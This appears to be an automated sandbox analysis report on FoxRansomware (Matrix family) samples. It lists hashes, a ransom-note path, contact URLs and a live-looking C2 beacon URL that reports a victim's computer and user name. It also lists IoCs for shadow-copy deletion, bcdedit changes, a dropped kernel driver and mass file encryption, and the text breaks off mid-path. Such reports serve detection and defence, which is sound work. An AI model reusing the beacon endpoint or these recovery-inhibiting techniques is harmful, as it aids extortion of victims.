Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-04-2024 17:56
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20240319-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20240226-en
General
-
Target
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
-
Size
1.2MB
-
MD5
76b640aa00354e46b29ca7ac2adfd732
-
SHA1
afebf9d72ba7186afefebf4deda87675621b0b8b
-
SHA256
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7
-
SHA512
fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552
-
SSDEEP
24576:l/SA+2lraRrjSJR5ezmT1dM9tZBrPyvaNn:zXlabPyyN
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#FOX_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Program Files\Java\jre7\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Library\Analysis\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe HTTP URL 3 http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=IZKCKOTP|Admin&sid=Zp2laqYgI1DcqJmC&phase=START Process not Found File created C:\Users\Admin\Favorites\Links\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Google\Chrome\Application\SetupMetrics\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Templates\1033\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jre7\lib\cmm\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Library\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\Admin\Contacts\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\All Users\Microsoft Help\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\All Users\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1036\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\All Users\Microsoft\Assistance\Client\1.0\ja-JP\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\default_apps\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Users\All Users\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Stationery\1033\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2192 bcdedit.exe 4828 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 2712 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS nt7HdeS164.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" nt7HdeS164.exe -
Executes dropped EXE 3 IoCs
pid Process 2464 NWtN47iM.exe 3388 nt7HdeS1.exe 4796 nt7HdeS164.exe -
Loads dropped DLL 4 IoCs
pid Process 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 2856 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe 3700 cmd.exe 3388 nt7HdeS1.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3904 takeown.exe -
resource yara_rule behavioral3/files/0x000600000001661c-3820.dat upx behavioral3/memory/3388-4826-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\Q: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\J: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\G: nt7HdeS164.exe File opened (read-only) \??\J: nt7HdeS164.exe File opened (read-only) \??\M: nt7HdeS164.exe File opened (read-only) \??\X: nt7HdeS164.exe File opened (read-only) \??\E: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\Z: nt7HdeS164.exe File opened (read-only) \??\O: nt7HdeS164.exe File opened (read-only) \??\Z: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\V: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\N: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\M: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\K: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\E: nt7HdeS164.exe File opened (read-only) \??\N: nt7HdeS164.exe File opened (read-only) \??\R: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\O: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\G: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\U: nt7HdeS164.exe File opened (read-only) \??\W: nt7HdeS164.exe File opened (read-only) \??\T: nt7HdeS164.exe File opened (read-only) \??\Y: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\X: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\L: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\H: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\A: nt7HdeS164.exe File opened (read-only) \??\B: nt7HdeS164.exe File opened (read-only) \??\S: nt7HdeS164.exe File opened (read-only) \??\W: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\U: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\T: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\I: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\Y: nt7HdeS164.exe File opened (read-only) \??\I: nt7HdeS164.exe File opened (read-only) \??\K: nt7HdeS164.exe File opened (read-only) \??\L: nt7HdeS164.exe File opened (read-only) \??\R: nt7HdeS164.exe File opened (read-only) \??\V: nt7HdeS164.exe File opened (read-only) \??\P: 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened (read-only) \??\H: nt7HdeS164.exe File opened (read-only) \??\P: nt7HdeS164.exe File opened (read-only) \??\Q: nt7HdeS164.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 myexternalip.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\aehUlKm1.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18237_.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14867_.GIF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0234376.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Beirut 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04323_.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR15F.GIF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382950.JPG 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7EN.LEX 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Uzhgorod 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188667.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Marquesas 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Pushpin.thmx 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Barbados 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-ui.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199307.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\TAB_ON.GIF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File created C:\Program Files\Mozilla Firefox\uninstall\#FOX_README#.rtf 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guatemala 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Miquelon 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBWZINT.REST.IDX_DLL 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OIS_COL.HXC 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGREPFRM.XML 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL102.XML 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Couture.xml 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CATWIZ.POC 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SLERROR.XML 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierUpArrow.jpg 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Mawson 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00448_.WMF 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_pressed.gif 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\WANS.NET.XML 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bangkok 0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 